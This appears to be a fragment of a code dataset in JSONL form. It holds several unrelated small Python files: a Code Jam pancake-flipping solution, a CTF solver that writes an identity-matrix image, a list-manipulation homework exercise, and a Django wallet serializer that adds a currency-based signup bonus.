app.mainloop()\n","repo_name":"cheng-lincoln/pixel-editor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23543180241","text":"#!/usr/bin/env python\nfrom sys import stdin\n\n\ndef process():\n line = stdin.readline().split(\" \")\n S = list(line[0])\n K = int(line[1])\n flips = 0\n for i in range(len(S) - K + 1):\n if S[i] == '-':\n flips += 1\n for j in range(i, i + K):\n S[j] = '+' if S[j] == '-' else '-'\n if '-' in S:\n return \"IMPOSSIBLE\"\n else:\n return 
flips\n\ndef main():\n N = int(stdin.readline())\n for i in range(N):\n print(\"Case #{}: {}\".format(i + 1, process()))\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2350.py","file_name":"2350.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1592820597","text":"# image to matrix\nfrom PIL import Image\nimport numpy as np\n\n# the identity 3d tensor\naidi = np.zeros((225, 3, 3), dtype=np.uint8)\nfor i in range(0, 225):\n aidi[i] = np.identity(3)\n\n# ar = np.matmul(ar, aidi)\n# np.set_printoptions(threshold=sys.maxsize)\n# print(ar)\n# print(aidi)\n\n# save matrix to image\ndat = Image.fromarray(aidi)\ndat.save('solve.png')\ndat.show()","repo_name":"CTF-Find-IT-2023/CTF-Find-IT-2023-Chall","sub_path":"challenge-unreleased/Web/Image Multiplier/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"20550673604","text":"# 2)\tGiven 2 lists: a = [4,6,'py','tell',78] b = [44,'hello',56,'exept',3]\n# Perform the following operations:\n# 1) Concatenate the two lists.\n# 2) Insert the element 6 at position 3.\n# 3) Remove all string elements.\n# 4) Count the number of elements in the list.\na = [4,6,'py','tell',78]\nb = [44,'hello',56,'exept',3]\nc = a + b\nprint(f\"New list after concatenation: {c}\")\nc.insert(2,6)\nprint(f\"List after inserting the element: {c}\")\nind = 0\nwhile ind < len(c):\n if type(c[ind]) == str:\n # stay at this index after a pop: the next element shifts into this slot\n c.pop(ind)\n else:\n ind += 1\nprint(f\"List after removing the string elements: {c}\")\nlong = len(c)\nprint(f\"The list is {long} elements long\")\n","repo_name":"Janyasvetlovskiy/Evgeniy_Svetlovskiy_Homeworks1","sub_path":"homework_7/taks_2.py","file_name":"taks_2.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7521212004","text":"from rest_framework import serializers\n\nfrom wallet.models import BANK_BONUS_RUB, BANK_BONUS_USD_EUR, Wallet\n\n\nclass WalletSerializer(serializers.ModelSerializer):\n user = serializers.PrimaryKeyRelatedField(read_only=True)\n balance = serializers.DecimalField(max_digits=200, decimal_places=2, default=0, read_only=True)\n\n class Meta:\n model = Wallet\n fields = (\n \"id\",\n \"user\",\n \"name\",\n \"type\",\n \"currency\",\n \"balance\",\n \"created_on\",\n \"modified_on\",\n )\n\n def create(self, validated_data):\n \"\"\"\n Add a default bank bonus to each newly created wallet:\n if the wallet currency is USD or EUR - balance=3.00,\n if RUB - balance=100.00\n \"\"\"\n\n if validated_data[\"currency\"] in [\"USD\", \"EUR\"]:\n balance = BANK_BONUS_USD_EUR\n elif validated_data[\"currency\"] == \"RUB\":\n balance = BANK_BONUS_RUB\n else:\n balance = 0 # no signup bonus for other currencies\n\n user = self.context[\"request\"].user\n\n return Wallet.objects.create(**validated_data,\n user=user,\n balance=balance)\n","repo_name":"Dm1triiSmirnov/drf_project2","sub_path":"wallet/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
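The WalletSerializer record above encodes a currency-dependent signup bonus inside create(). Below is a hedged sketch of that rule as a standalone, Django-free function so it can be unit-tested in isolation; the Decimal amounts follow the docstring (the real values live in wallet.models), and the zero fallback for other currencies is an assumption.

```python
from decimal import Decimal

# Amounts mirror the docstring above; assumed stand-ins for wallet.models.
BANK_BONUS_USD_EUR = Decimal("3.00")
BANK_BONUS_RUB = Decimal("100.00")

def signup_bonus(currency: str) -> Decimal:
    """Bank bonus credited to a freshly created wallet."""
    if currency in ("USD", "EUR"):
        return BANK_BONUS_USD_EUR
    if currency == "RUB":
        return BANK_BONUS_RUB
    return Decimal("0.00")  # assumed: no bonus for other currencies

assert signup_bonus("EUR") == Decimal("3.00")
assert signup_bonus("RUB") == Decimal("100.00")
assert signup_bonus("GBP") == Decimal("0.00")
```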